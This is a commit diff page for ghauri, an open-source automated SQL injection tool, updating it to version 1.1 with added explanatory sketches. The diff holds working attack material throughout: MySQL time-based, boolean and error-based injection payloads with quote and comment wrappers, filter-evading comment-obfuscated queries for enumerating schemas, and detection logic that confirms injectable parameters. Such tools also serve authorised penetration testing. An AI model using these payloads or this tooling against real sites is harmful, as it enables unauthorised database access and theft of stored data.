ghauri / Commits / 2cbdbeca
  • Ghauri v1.1: improved code quality and boolean-based injection detection; added proper error handling when the Microsoft Access DBMS is identified (fixed #34); added redirect handling on user demand for cases where the injection is in a redirect response.

  • r0oth3x49 committed 1 year ago
    2cbdbeca
    1 parent 2b97bf0a
  • ghauri/__init__.py
    skipped 23 lines
    24 24   
    25 25  """
    26 26   
    27  -__version__ = "1.0.9"
     27 +__version__ = "1.1"
    28 28  __author__ = "Nasir Khan (r0ot h3x49)"
    29 29  __license__ = "MIT"
    30 30  __copyright__ = "Copyright (c) 2016-2025 Nasir Khan (r0ot h3x49)"
    skipped 2 lines
  • ghauri/common/config.py
    skipped 35 lines
    36 36   is_string=False,
    37 37   is_json=False,
    38 38   is_multipart=False,
    39  - skip_urlencodig=False,
     39 + skip_urlencoding=False,
    40 40   filepaths=None,
    41 41   proxy=None,
    42 42   text_only=False,
    skipped 10 lines
    53 53   backend=None,
    54 54   batch=False,
    55 55   continue_on_http_error=False,
     56 + follow_redirects=None,
    56 57   ):
    57 58   self.vectors = vectors
    58 59   self.is_string = is_string
    59 60   self.is_json = is_json
    60 61   self.is_multipart = is_multipart
    61  - self.skip_urlencodig = skip_urlencodig
     62 + self.skip_urlencoding = skip_urlencoding
    62 63   self.filepaths = filepaths
    63 64   self._session_filepath = None
    64 65   self.proxy = proxy
    skipped 12 lines
    77 78   self.delay = delay
    78 79   self.timesec = timesec
    79 80   self.continue_on_http_error = continue_on_http_error
     81 + self.follow_redirects = follow_redirects
    80 82   
    81 83   @property
    82 84   def session_filepath(self):
    skipped 7 lines
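
The new follow_redirects field is deliberately tri-state: None means the user has not been asked yet, while True/False record the answer once given. A minimal standalone sketch of that pattern (illustrative names, not ghauri's actual API):

    # Sketch of the tri-state redirect flag added to conf above:
    # None = not asked yet, True/False = the user's remembered choice.
    follow_redirects = None  # stands in for conf.follow_redirects

    def should_follow(code, url):
        global follow_redirects
        if follow_redirects is None:  # first redirect seen: ask once
            choice = input(f"got a {code} redirect to '{url}'. Follow? [Y/n] ")
            follow_redirects = choice.strip().lower() != "n"  # default: yes
        return follow_redirects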
  • ghauri/common/payloads.py
    skipped 174 lines
    175 175   {"pref": ") ", "suf": "-- wXyW"},
    176 176   {"pref": "') ", "suf": "-- wXyW"},
    177 177   {"pref": '") ', "suf": "-- wXyW"},
    178  - {"pref": "' ", "suf": " OR '04586'='4586--"},
    179  - {"pref": '" ', "suf": ' OR "04586"="4586--'},
     178 + {"pref": "' ", "suf": " OR '04586'='4586"},
     179 + {"pref": '" ', "suf": ' OR "04586"="4586'},
    180 180   {"pref": ") ", "suf": " AND (04586=4586"},
    181 181   {"pref": ") ", "suf": " OR (04586=4586"},
    182 182   {"pref": "') ", "suf": " AND ('04586'='4586"},
    skipped 217 lines
    400 400   ],
    401 401   "time-based": [
    402 402   {
    403  - "payload": "(SELECT(1)FROM(SELECT(SLEEP([SLEEPTIME])))a)",
     403 + "payload": "(SELECT(0)FROM(SELECT(SLEEP([SLEEPTIME])))a)",
    404 404   "comments": [
    405 405   {"pref": "'XOR", "suf": "XOR'Z"},
    406 406   {"pref": '"XOR', "suf": 'XOR"Z'},
    skipped 18 lines
    425 425   # {"pref": '")AND', "suf": 'AND("1"="1-- wXyW'},
    426 426   ],
    427 427   "title": "MySQL >= 5.0.12 time-based blind (query SLEEP)",
    428  - "vector": "(SELECT(1)FROM(SELECT(IF([INFERENCE],SLEEP([SLEEPTIME]),0)))a)",
     428 + "vector": "(SELECT(0)FROM(SELECT(IF([INFERENCE],SLEEP([SLEEPTIME]),0)))a)",
    429 429   "dbms": "MySQL",
    430 430   },
    431 431   {
    skipped 333 lines
    765 765   "dbms": "MySQL",
    766 766   },
    767 767   {
    768  - "payload": "AND UPDATEXML(0,CONCAT(0x7e,0x72306f746833783439,0x7e),0)",
     768 + "payload": "UPDATEXML(0,CONCAT(0x7e,0x72306f746833783439,0x7e),0)",
    769 769   "comments": [
    770  - # {"pref": " ", "suf": ""},
    771  - {"pref": " ", "suf": "-- wXyW"},
    772  - {"pref": " ", "suf": "#"},
     770 + {"pref": "", "suf": ""},
     771 + {"pref": "(", "suf": ")"},
     772 + {"pref": " AND ", "suf": "-- wXyW"},
     773 + {"pref": " AND ", "suf": "#"},
    773 774   # {"pref": "' ", "suf": ""},
    774  - {"pref": "' ", "suf": "-- wXyW"},
    775  - {"pref": "' ", "suf": "#"},
     775 + {"pref": "' AND ", "suf": "-- wXyW"},
     776 + {"pref": "' AND ", "suf": "#"},
    776 777   # {"pref": '" ', "suf": ""},
    777  - {"pref": '" ', "suf": "-- wXyW"},
    778  - {"pref": '" ', "suf": "#"},
     778 + {"pref": '" AND ', "suf": "-- wXyW"},
     779 + {"pref": '" AND ', "suf": "#"},
    779 780   # {"pref": ") ", "suf": ""},
    780  - {"pref": ") ", "suf": "-- wXyW"},
    781  - {"pref": ") ", "suf": "#"},
     781 + {"pref": ") AND ", "suf": "-- wXyW"},
     782 + {"pref": ") AND ", "suf": "#"},
    782 783   # {"pref": "') ", "suf": ""},
    783  - {"pref": "') ", "suf": "-- wXyW"},
    784  - {"pref": "') ", "suf": "#"},
     784 + {"pref": "') AND ", "suf": "-- wXyW"},
     785 + {"pref": "') AND ", "suf": "#"},
    785 786   # {"pref": '") ', "suf": ""},
    786  - {"pref": '") ', "suf": "-- wXyW"},
    787  - {"pref": '") ', "suf": "#"},
     787 + {"pref": '") AND ', "suf": "-- wXyW"},
     788 + {"pref": '") AND ', "suf": "#"},
    788 789   ],
    789 790   "title": "MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)",
    790  - "vector": "AND UPDATEXML(0,CONCAT(0x28,0x7e,[INFERENCE],0x7e),0)",
     791 + "vector": "UPDATEXML(0,CONCAT(0x7e,[INFERENCE],0x7e),0)",
    791 792   "dbms": "MySQL",
    792 793   },
    793 794   {
    794  - "payload": "AND EXTRACTVALUE(0,CONCAT(0x7e,0x72306f746833783439,0x7e))",
     795 + "payload": "EXTRACTVALUE(0,CONCAT(0x7e,0x72306f746833783439,0x7e))",
    795 796   "comments": [
    796  - # {"pref": " ", "suf": ""},
    797  - {"pref": " ", "suf": "-- wXyW"},
    798  - {"pref": " ", "suf": "#"},
     797 + {"pref": "", "suf": ""},
     798 + {"pref": "(", "suf": ")"},
     799 + {"pref": " AND ", "suf": "-- wXyW"},
     800 + {"pref": " AND ", "suf": "#"},
    799 801   # {"pref": "' ", "suf": ""},
    800  - {"pref": "' ", "suf": "-- wXyW"},
    801  - {"pref": "' ", "suf": "#"},
     802 + {"pref": "' AND ", "suf": "-- wXyW"},
     803 + {"pref": "' AND ", "suf": "#"},
    802 804   # {"pref": '" ', "suf": ""},
    803  - {"pref": '" ', "suf": "-- wXyW"},
    804  - {"pref": '" ', "suf": "#"},
     805 + {"pref": '" AND ', "suf": "-- wXyW"},
     806 + {"pref": '" AND ', "suf": "#"},
    805 807   # {"pref": ") ", "suf": ""},
    806  - {"pref": ") ", "suf": "-- wXyW"},
    807  - {"pref": ") ", "suf": "#"},
     808 + {"pref": ") AND ", "suf": "-- wXyW"},
     809 + {"pref": ") AND ", "suf": "#"},
    808 810   # {"pref": "') ", "suf": ""},
    809  - {"pref": "') ", "suf": "-- wXyW"},
    810  - {"pref": "') ", "suf": "#"},
     811 + {"pref": "') AND ", "suf": "-- wXyW"},
     812 + {"pref": "') AND ", "suf": "#"},
    811 813   # {"pref": '") ', "suf": ""},
    812  - {"pref": '") ', "suf": "-- wXyW"},
    813  - {"pref": '") ', "suf": "#"},
     814 + {"pref": '") AND ', "suf": "-- wXyW"},
     815 + {"pref": '") AND ', "suf": "#"},
    814 816   ],
    815 817   "title": "MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)",
    816  - "vector": "AND EXTRACTVALUE(0,CONCAT(0x7e,[INFERENCE],0x7e))",
     818 + "vector": "EXTRACTVALUE(0,CONCAT(0x7e,[INFERENCE],0x7e))",
    817 819   "dbms": "MySQL",
    818 820   },
    819 821   {
    skipped 23 lines
    843 845   "dbms": "MySQL",
    844 846   },
    845 847   {
    846  - "payload": "AND UPDATEXML(0,CONCAT_WS('r0oth3x49'),0)",
     848 + "payload": "AND UPDATEXML(0,CONCAT_WS('(', '~','r0oth3x49','~'),0)",
    847 849   "comments": [
    848 850   # {"pref": " ", "suf": ""},
    849 851   {"pref": " ", "suf": "-- wXyW"},
    skipped 123 lines
    973 975   "dbms": "MySQL",
    974 976   },
    975 977   {
    976  - "payload": "AND EXTRACTVALUE(0,CONCAT_WS(0x28,0x7e,0x72306f746833783439,0x7e))",
     978 + "payload": "EXTRACTVALUE(0,CONCAT_WS(0x28,0x7e,0x72306f746833783439,0x7e))",
    977 979   "comments": [
    978  - # {"pref": " ", "suf": ""},
    979  - {"pref": " ", "suf": "-- wXyW"},
    980  - {"pref": " ", "suf": "#"},
     980 + {"pref": "", "suf": ""},
     981 + {"pref": "(", "suf": ")"},
     982 + {"pref": " AND ", "suf": "-- wXyW"},
     983 + {"pref": " AND ", "suf": "#"},
    981 984   # {"pref": "' ", "suf": ""},
    982  - {"pref": "' ", "suf": "-- wXyW"},
    983  - {"pref": "' ", "suf": "#"},
     985 + {"pref": "' AND ", "suf": "-- wXyW"},
     986 + {"pref": "' AND ", "suf": "#"},
    984 987   # {"pref": '" ', "suf": ""},
    985  - {"pref": '" ', "suf": "-- wXyW"},
    986  - {"pref": '" ', "suf": "#"},
     988 + {"pref": '" AND ', "suf": "-- wXyW"},
     989 + {"pref": '" AND ', "suf": "#"},
    987 990   # {"pref": ") ", "suf": ""},
    988  - {"pref": ") ", "suf": "-- wXyW"},
    989  - {"pref": ") ", "suf": "#"},
     991 + {"pref": ") AND ", "suf": "-- wXyW"},
     992 + {"pref": ") AND ", "suf": "#"},
    990 993   # {"pref": "') ", "suf": ""},
    991  - {"pref": "') ", "suf": "-- wXyW"},
    992  - {"pref": "') ", "suf": "#"},
     994 + {"pref": "') AND ", "suf": "-- wXyW"},
     995 + {"pref": "') AND ", "suf": "#"},
    993 996   # {"pref": '") ', "suf": ""},
    994  - {"pref": '") ', "suf": "-- wXyW"},
    995  - {"pref": '") ', "suf": "#"},
     997 + {"pref": '") AND ', "suf": "-- wXyW"},
     998 + {"pref": '") AND ', "suf": "#"},
    996 999   ],
    997 1000   "title": "MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)",
    998  - "vector": "AND EXTRACTVALUE(0,CONCAT_WS(0x28,0x7e,[INFERENCE],0x7e))",
     1001 + "vector": "EXTRACTVALUE(0,CONCAT_WS(0x28,0x7e,[INFERENCE],0x7e))",
    999 1002   "dbms": "MySQL",
    1000 1003   },
    1001 1004   {
    skipped 19 lines
    1021 1024   {"pref": '") ', "suf": "#"},
    1022 1025   ],
    1023 1026   "title": "MySQL >= 5.1 OR error-based - WHERE or HAVING clause (EXTRACTVALUE)",
    1024  - "vector": "AND EXTRACTVALUE(0,CONCAT_WS(0x28,0x7e,[INFERENCE],0x7e))",
     1027 + "vector": "OR EXTRACTVALUE(0,CONCAT_WS(0x28,0x7e,[INFERENCE],0x7e))",
    1025 1028   "dbms": "MySQL",
    1026 1029   },
    1027 1030   # {
    skipped 769 lines
    1797 1800  PAYLOADS_DBS_COUNT = {
    1798 1801   "MySQL": [
    1799 1802   "(SELECT COUNT(*)FROM(INFORMATION_SCHEMA.SCHEMATA))",
    1800  - "(/*!SELECT*//**_**/COUNT(*)%23/**_**/%0AFROM%23/**_**/%0A(/*!INFORMATION_SCHEMA*/./**_**//*!SCHEMATA*/))",
    1801 1803   "(/*!50000SELECT*/ COUNT(*)/*!50000FROM*//*!50000(INFORMATION_SCHEMA.SCHEMATA)*/)",
    1802 1804   "(/*!50000SELECT*/ COUNT(*)/*!50000FROM*/(/*!50000INFORMATION_SCHEMA*/./*!50000SCHEMATA*/))",
     1805 + # "(/*!SELECT*//**_**/COUNT(*)%23/**_**/%0AFROM%23/**_**/%0A(/*!INFORMATION_SCHEMA*/./**_**//*!SCHEMATA*/))",
    1803 1806   ],
    1804 1807   "PostgreSQL": [
    1805 1808   "(SELECT COUNT(DISTINCT(schemaname)) FROM pg_tables)",
    skipped 30 lines
    1836 1839   "(SELECT IFNULL(SCHEMA_NAME,0x20) FROM(INFORMATION_SCHEMA.SCHEMATA)LIMIT 0,1)",
    1837 1840   "(SELECT CONCAT(SCHEMA_NAME)FROM(INFORMATION_SCHEMA.SCHEMATA)LIMIT 0,1)",
    1838 1841   "(SELECT CONCAT/**_**/(SCHEMA_NAME)FROM(INFORMATION_SCHEMA.SCHEMATA)LIMIT 0,1)",
    1839  - "(/*!SELECT*//**_**/CONCAT/**_**/(/*!50000SCHEMA_NAME*/)%23/**_**/%0AFROM%23/**_**/%0A(/*!INFORMATION_SCHEMA*/./**_**//*!SCHEMATA*/))LIMIT 0,1",
    1840 1842   "(SELECT CONCAT_WS(0x28,0x7e,SCHEMA_NAME)FROM(INFORMATION_SCHEMA.SCHEMATA)LIMIT 0,1)",
    1841 1843   "(/*!SELECT*/ CONCAT_WS(0x28,0x7e,/*!SCHEMA_NAME*/)FROM(/*!INFORMATION_SCHEMA*/./**_**//*!SCHEMATA*/)LIMIT/**_**/0,1)",
     1844 + # "(/*!SELECT*//**_**/CONCAT/**_**/(/*!50000SCHEMA_NAME*/)/**_**/FROM/**_**/%0A(/*!INFORMATION_SCHEMA*/./**_**//*!SCHEMATA*/)%23LIMIT 0,1)",
    1842 1845   ],
    1843 1846   "PostgreSQL": [
    1844 1847   "(SELECT DISTINCT(schemaname) FROM pg_tables ORDER BY schemaname OFFSET 0 LIMIT 1)",
    skipped 208 lines
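
The net effect of moving the leading AND out of the UPDATEXML/EXTRACTVALUE payloads and into the pref/suf pairs is that the bare function call can now also be tried unwrapped or parenthesized. A rough illustration of how such an entry fans out into concrete test strings (structure mirrors the entries above; the expansion loop is illustrative, not ghauri's internals):

    # Every pref/suf pair wraps the base payload into one test string.
    entry = {
        "payload": "EXTRACTVALUE(0,CONCAT(0x7e,0x72306f746833783439,0x7e))",
        "comments": [
            {"pref": "", "suf": ""},      # bare call, usable inside an expression
            {"pref": "(", "suf": ")"},    # parenthesized variant
            {"pref": "' AND ", "suf": "-- wXyW"},
        ],
    }
    for c in entry["comments"]:
        print(f"{c['pref']}{entry['payload']}{c['suf']}")
    # e.g. ' AND EXTRACTVALUE(0,CONCAT(0x7e,0x72306f746833783439,0x7e))-- wXyW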
  • ghauri/common/utils.py
    skipped 154 lines
    155 155   
    156 156  class SmartRedirectHandler(HTTPRedirectHandler):
    157 157   def http_error_302(self, req, fp, code, msg, headers):
    158  - infourl = addinfourl(fp, headers, req.get_full_url())
    159  - infourl.status = code
    160  - infourl.code = code
     158 + infourl = addinfourl(fp, headers, req.get_full_url(), code=code)
     159 + redirect_url = headers.get("Location")
     160 + if not urlparse(redirect_url).netloc:
     161 + redirect_url = urljoin(req.get_full_url(), redirect_url)
     162 + if conf.follow_redirects == None:
     163 + choice = logger.read_input(
     164 + f"got a {code} redirect to '{redirect_url}'. Do you want to follow? [Y/n] ",
     165 + batch=False,
     166 + user_input="Y",
     167 + )
     168 + if choice and choice == "y":
     169 + conf.follow_redirects = True
     170 + if choice and choice == "n":
     171 + conf.follow_redirects = False
    161 172   return infourl
    162 173   
    163 174   http_error_301 = http_error_303 = http_error_307 = http_error_302
    skipped 512 lines
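
For context, urllib only follows a 3xx when HTTPRedirectHandler issues a new request; returning the original response from http_error_302, as above, hands the redirect back to the caller instead. A self-contained sketch of the same interception idea, without ghauri's prompt and conf plumbing:

    from urllib.request import HTTPRedirectHandler, build_opener
    from urllib.response import addinfourl
    from urllib.parse import urljoin, urlparse

    class InterceptRedirects(HTTPRedirectHandler):
        def http_error_302(self, req, fp, code, msg, headers):
            # Returning a response here (instead of deferring to the parent)
            # makes urllib surface the 3xx itself rather than following it.
            infourl = addinfourl(fp, headers, req.get_full_url(), code=code)
            location = headers.get("Location") or ""
            if not urlparse(location).netloc:  # resolve relative Location
                location = urljoin(req.get_full_url(), location)
            print(f"intercepted {code} -> {location}")
            return infourl

        http_error_301 = http_error_303 = http_error_307 = http_error_302

    opener = build_opener(InterceptRedirects())
    # resp = opener.open("http://example.com/redirects-somewhere")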
    676 687   difference = candidate
    677 688   is_vulner = True
    678 689   break
      690 + # case where the true/false response ratios differ but no suggested --string or --not-string value was found.
     691 + if (
     692 + not difference
     693 + and conf.match_ratio
     694 + and conf.match_ratio != ratio_true
     695 + ):
     696 + is_vulner = True
     697 + case = "Match Ratio"
    679 698   if difference and is_vulner:
    680 699   string = difference
    681 700   not_string = ""
    skipped 70 lines
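
The fallback above flags a parameter when the similarity ratios of the true and false responses diverge even though no stable --string candidate was found. Roughly (assuming a difflib-style similarity score; ghauri's exact scoring and the meaning of conf.match_ratio may differ):

    from difflib import SequenceMatcher

    def page_ratio(a, b):
        return round(SequenceMatcher(None, a, b).ratio(), 2)

    base = "Welcome back, admin. You have 3 new messages."
    page_true = "Welcome back, admin. You have 3 new messages."
    page_false = "No results found."

    ratio_true = page_ratio(base, page_true)    # 1.0
    ratio_false = page_ratio(base, page_false)  # well below 1.0
    # ghauri's fallback compares a stored match ratio against the tested
    # payload's ratio; divergence alone marks the parameter as injectable.
    if ratio_true != ratio_false:
        print("true/false responses diverge -> boolean-based injection likely")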
    752 771   and injection_type not in ["HEADER", "COOKIE"]
    753 772   and not is_multipart
    754 773   ):
    755  - if not conf.skip_urlencodig:
     774 + if not conf.skip_urlencoding:
    756 775   _temp = quote(value, safe=safe)
    757  - if conf.skip_urlencodig:
     776 + if conf.skip_urlencoding:
    758 777   if not conf.is_multipart and not conf.is_json:
    759 778   _temp = value.replace(" ", "+")
    760 779   return _temp
    skipped 460 lines
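
The renamed flag switches between full percent-encoding and a minimal space-to-plus substitution. In isolation:

    from urllib.parse import quote

    value = "' AND SLEEP(5)-- wXyW"
    print(quote(value, safe=""))    # skip_urlencoding=False: percent-encode
    # %27%20AND%20SLEEP%285%29--%20wXyW
    print(value.replace(" ", "+"))  # skip_urlencoding=True: only spaces -> +
    # '+AND+SLEEP(5)--+wXyW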
    1221 1240   prepared_payload = re.sub(
    1222 1241   REGEX_MULTIPART_INJECTION, "\\1\\2\\3%s\\4" % (payload), text
    1223 1242   )
    1224  - logger.debug(f"prepared payload: {prepared_payload}")
     1243 + # logger.debug(f"prepared payload: {prepared_payload}")
    1225 1244   return prepared_payload
    1226 1245   
    1227 1246   
    skipped 56 lines
    1284 1303   
    1285 1304  def fetch_payloads_by_suffix_prefix(payloads, prefix=None, suffix=None):
    1286 1305   _temp = []
    1287  - if not prefix and not suffix:
     1306 + # logger.debug(f"prefix=({prefix}), suffix=({suffix})")
     1307 + Payload = collections.namedtuple("Payload", ["prefix", "suffix", "string", "raw"])
     1308 + if prefix == "" and suffix == "":
     1309 + payload = payloads[-1].raw
     1310 + _temp = [
     1311 + Payload(
     1312 + prefix=prefix,
     1313 + suffix=suffix,
     1314 + string=f"{prefix}{payload}{suffix}",
     1315 + raw=payload,
     1316 + )
     1317 + ]
     1318 + if prefix == None and suffix == None:
    1288 1319   _temp = payloads
    1289  - Payload = collections.namedtuple("Payload", ["prefix", "suffix", "string", "raw"])
    1290 1320   if prefix and not suffix:
    1291 1321   for entry in payloads:
    1292 1322   prefix = urldecode(prefix)
    skipped 5 lines
    1298 1328   # logger.debug(f"skipping payload '{entry.raw}'")
    1299 1329   if _pref and prefix and _pref[0] == prefix[0]:
    1300 1330   _temp.append(entry)
    1301  - # we should try all the suffix for now
    1302  - # if suffix and not prefix:
    1303  - # for entry in payloads:
    1304  - # suffix = urldecode(suffix)
    1305  - # _suff = entry.suffix
    1306  - # if _suff != suffix:
    1307  - # logger.debug(f"skipping payload '{entry.raw}'")
    1308  - # if _suff == suffix:
    1309  - # _temp.append(entry)
      1331 + # we should try all prefixes for now
     1332 + if suffix and not prefix:
     1333 + for entry in payloads:
     1334 + suffix = urldecode(suffix)
     1335 + _suff = entry.suffix
     1336 + # if suffix not in _suff:
     1337 + # logger.debug(f"skipping payload '{entry.raw}'")
     1338 + if suffix in _suff:
     1339 + _temp.append(entry)
    1310 1340   if prefix and suffix:
    1311 1341   # logger.debug(
    1312 1342   # f" both prefix and suffix are found for injection.. '{prefix}', '{suffix}'"
    skipped 7 lines
    1320 1350   # if not _temp:
    1321 1351   payload = payloads[-1].raw
    1322 1352   if prefix and prefix[-1] in [")", "'", '"']:
    1323  - prefix += " "
     1353 + if not prefix.endswith(" "):
     1354 + prefix += " "
    1324 1355   _temp = [
    1325 1356   Payload(
    1326 1357   prefix=prefix,
    skipped 458 lines
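
fetch_payloads_by_suffix_prefix now distinguishes an empty-string prefix/suffix (rebuild the last payload bare) from None (nothing known, try everything), and matches suffixes by substring. A reduced sketch of the suffix branch (the namedtuple mirrors the Payload type above; sample entries are illustrative):

    import collections

    Payload = collections.namedtuple("Payload", ["prefix", "suffix", "string", "raw"])
    payloads = [
        Payload("' ", "-- wXyW", "' OR 1=1-- wXyW", "OR 1=1"),
        Payload('" ', "#", '" OR 1=1#', "OR 1=1"),
    ]

    def filter_by_suffix(entries, suffix):
        if suffix is None:   # None: no suffix known, keep every candidate
            return list(entries)
        if suffix == "":     # "": rebuild the last payload with no wrapping
            raw = entries[-1].raw
            return [Payload("", "", raw, raw)]
        return [e for e in entries if suffix in e.suffix]  # substring match

    print(filter_by_suffix(payloads, "#"))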
  • ghauri/core/extract.py
    skipped 66 lines
    67 67   """aa"""
    68 68   
    69 69   def __init__(
    70  - self, vectors="", is_string=False, skip_urlencodig=False, filepaths=None
     70 + self, vectors="", is_string=False, skip_urlencoding=False, filepaths=None
    71 71   ):
    72 72   self.vectors = vectors
    73 73   self.is_string = is_string
    74  - self.skip_urlencodig = skip_urlencodig
     74 + self.skip_urlencoding = skip_urlencoding
    75 75   self.filepaths = filepaths
    76 76   
    77 77   def _check_operator(
    skipped 2051 lines
  • ghauri/core/request.py
    skipped 48 lines
    49 49   SmartRedirectHandler,
    50 50  )
    51 51  from ghauri.logger.colored_logger import logger
     52 +from ghauri.common.config import conf
    52 53   
    53 54   
    54 55  class HTTPRequestHandler:
    skipped 68 lines
    123 124   handlers = []
    124 125   if proxy:
    125 126   handlers.append(proxy)
    126  - if not follow_redirects:
     127 + if conf.follow_redirects == None:
    127 128   handlers.append(SmartRedirectHandler())
     129 + if not conf.follow_redirects:
     130 + if len(handlers) == 1:
     131 + handlers.append(SmartRedirectHandler())
     132 + if not handlers:
     133 + handlers.append(SmartRedirectHandler())
    128 134   opener = build_opener(*handlers)
    129  - # opener.addheaders = custom_headers
    130 135   request = Request(url=url, headers=custom_headers)
    131 136   response = opener.open(request, timeout=timeout)
    132 137   else:
    skipped 47 lines
    180 185   handlers = []
    181 186   if proxy:
    182 187   handlers.append(proxy)
    183  - if not follow_redirects:
     188 + if conf.follow_redirects == None:
    184 189   handlers.append(SmartRedirectHandler())
     190 + if not conf.follow_redirects:
     191 + if len(handlers) == 1:
     192 + handlers.append(SmartRedirectHandler())
     193 + if not handlers:
     194 + handlers.append(SmartRedirectHandler())
    185 195   opener = build_opener(*handlers)
    186 196   request = Request(url=url, data=post_data, headers=custom_headers)
    187 197   response = opener.open(request, timeout=timeout)
    skipped 78 lines
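
The opener now installs the interceptor whenever the user has not explicitly opted into following redirects, i.e. conf.follow_redirects is None (not asked) or False (declined). A condensed sketch of that wiring, with a stub standing in for SmartRedirectHandler:

    from urllib.request import HTTPRedirectHandler, ProxyHandler, build_opener

    class InterceptRedirects(HTTPRedirectHandler):
        # Stub for SmartRedirectHandler: refuse to follow any 3xx.
        def redirect_request(self, req, fp, code, msg, headers, newurl):
            return None  # urllib then raises HTTPError for the 3xx

    def make_opener(follow_redirects, proxy=None):
        handlers = []
        if proxy:
            handlers.append(ProxyHandler({"http": proxy, "https": proxy}))
        if not follow_redirects:  # None (not asked) or False (declined)
            handlers.append(InterceptRedirects())
        return build_opener(*handlers)

    opener = make_opener(follow_redirects=None)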
  • ghauri/core/tests.py
    skipped 158 lines
    159 159   html = attack.filtered_text
    160 160   retval = search_possible_dbms_errors(html=attack.text)
    161 161   if retval.possible_dbms:
     162 + if attack.status_code in [302, 301, 303, 307]:
     163 + logger.debug(
     164 + f"SQL error detected in {attack.status_code} redirect response page."
     165 + )
    162 166   _possible_dbms = retval.possible_dbms
    163 167   possible_dbms = f"{mc}{_possible_dbms}{nc}"
    164 168   _it = injection_type
    skipped 304 lines
    469 473   blind_payloads = fetch_db_specific_payload(booleanbased_only=True)
    470 474   if dbms:
    471 475   dbms_specific_boolean_payloads = fetch_db_specific_payload(
    472  - booleanbased_only=True, dbms=dbms
     476 + booleanbased_only=True, dbms=dbms or possible_dbms
    473 477   )
    474 478   blind_payloads.extend(dbms_specific_boolean_payloads)
    475 479   param_key = parameter.get("key")
    skipped 19 lines
    495 499   payloads=entry.payloads, prefix=prefix, suffix=suffix
    496 500   )
    497 501   total_payloads = len(payloads)
     502 + if possible_dbms or dbms:
     503 + if entry.dbms and entry.dbms not in [possible_dbms, dbms]:
     504 + logger.debug(f"skipping '{entry.title}'")
     505 + continue
    498 506   logger.info(f"testing '{entry.title}'")
    499 507   while index_of_payload < total_payloads:
    500 508   if http_firewall_code_counter > 2 and not conf.continue_on_http_error:
    skipped 432 lines
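
The new guard skips payload families whose dbms tag contradicts a back-end already suggested by error messages, trimming needless requests. Stand-alone (entry titles are taken from the payload tables; the loop is a simplification):

    entries = [
        {"title": "MySQL >= 5.0.12 time-based blind (query SLEEP)", "dbms": "MySQL"},
        {"title": "Microsoft SQL Server time-based blind", "dbms": "Microsoft SQL Server"},
        {"title": "Generic boolean-based blind", "dbms": None},
    ]
    possible_dbms, dbms = "MySQL", None

    for entry in entries:
        if (possible_dbms or dbms) and entry["dbms"] and entry["dbms"] not in (possible_dbms, dbms):
            print(f"skipping '{entry['title']}'")
            continue  # wrong back-end: don't waste requests on this family
        print(f"testing '{entry['title']}'")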
    933 941   retry=3,
    934 942   techniques="T",
    935 943   code=None,
     944 + possible_dbms=None,
    936 945  ):
    937 946   Response = collections.namedtuple(
    938 947   "SQLi",
    skipped 62 lines
    1001 1010   payloads=entry.payloads, prefix=prefix, suffix=suffix
    1002 1011   )
    1003 1012   total_payloads = len(payloads)
     1013 + if possible_dbms or dbms:
     1014 + if entry.dbms and entry.dbms not in [possible_dbms, dbms]:
     1015 + logger.debug(f"skipping '{entry.title}'")
     1016 + continue
    1004 1017   logger.info(f"testing '{entry.title}'")
    1005 1018   while index_of_payload < total_payloads:
    1006 1019   if http_firewall_code_counter > 2 and not conf.continue_on_http_error:
    skipped 1039 lines
    2046 2059   if number_of_requests_performed == 4:
    2047 2060   number_of_requests_performed += bsqli.number_of_requests
    2048 2061   if "T" in techniques or "S" in techniques:
    2049  - if not dbms and possible_dbms:
    2050  - dbms = possible_dbms
    2051 2062   tsqli = check_timebased_sqli(
    2052 2063   base,
    2053 2064   parameter,
    skipped 13 lines
    2067 2078   is_json=is_json,
    2068 2079   retry=retries,
    2069 2080   techniques=techniques,
     2081 + possible_dbms=possible_dbms,
    2070 2082   )
    2071 2083   if tsqli and isinstance(tsqli, str) and tsqli == "next parameter":
    2072 2084   return None
    skipped 288 lines
  • ghauri/ghauri.py
    skipped 373 lines
    374 374   vector = vectors.get("boolean_vector")
    375 375   if not vector:
    376 376   vector = vectors.get("time_vector")
     377 + if backend == "Microsoft Access":
     378 + logger.warning(
     379 + "ghauri currently only supports DBMS fingerprint payloads for Microsoft Access, exfiltration will be added soon"
     380 + )
     381 + logger.info(
     382 + f"fetched data logged to text files under '{filepaths.filepath}'"
     383 + )
     384 + logger.end("ending")
     385 + exit(1)
    377 386   return GhauriResponse(
    378 387   url=url,
    379 388   data=data,
    skipped 409 lines
  • ghauri/scripts/ghauri.py
    skipped 286 lines
    287 287   "Enumeration",
    288 288   description=(
    289 289   "These options can be used to enumerate the back-end database"
    290  - "\nmanagment system information, structure and data contained in the\ntables."
     290 + "\nmanagement system information, structure and data contained in the\ntables."
    291 291   ),
    292 292   )
    293 293   enumeration.add_argument(
    skipped 70 lines
    364 364   "--start",
    365 365   dest="limitstart",
    366 366   type=int,
    367  - help="Retrive entries from offset for dbs/tables/columns/dump",
     367 + help="Retrieve entries from offset for dbs/tables/columns/dump",
    368 368   default=0,
    369 369   metavar="",
    370 370   )
    skipped 1 lines
    372 372   "--stop",
    373 373   dest="limitstop",
    374 374   type=int,
    375  - help="Retrive entries till offset for dbs/tables/columns/dump",
     375 + help="Retrieve entries till offset for dbs/tables/columns/dump",
    376 376   default=None,
    377 377   metavar="",
    378 378   )
    skipped 116 lines
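
The corrected help strings belong to the enumeration window options; in miniature, the pair behaves like this (argparse names taken from the diff):

    import argparse

    parser = argparse.ArgumentParser(prog="ghauri")
    parser.add_argument("--start", dest="limitstart", type=int, default=0, metavar="",
                        help="Retrieve entries from offset for dbs/tables/columns/dump")
    parser.add_argument("--stop", dest="limitstop", type=int, default=None, metavar="",
                        help="Retrieve entries till offset for dbs/tables/columns/dump")

    args = parser.parse_args(["--start", "2", "--stop", "5"])
    print(args.limitstart, args.limitstop)  # 2 5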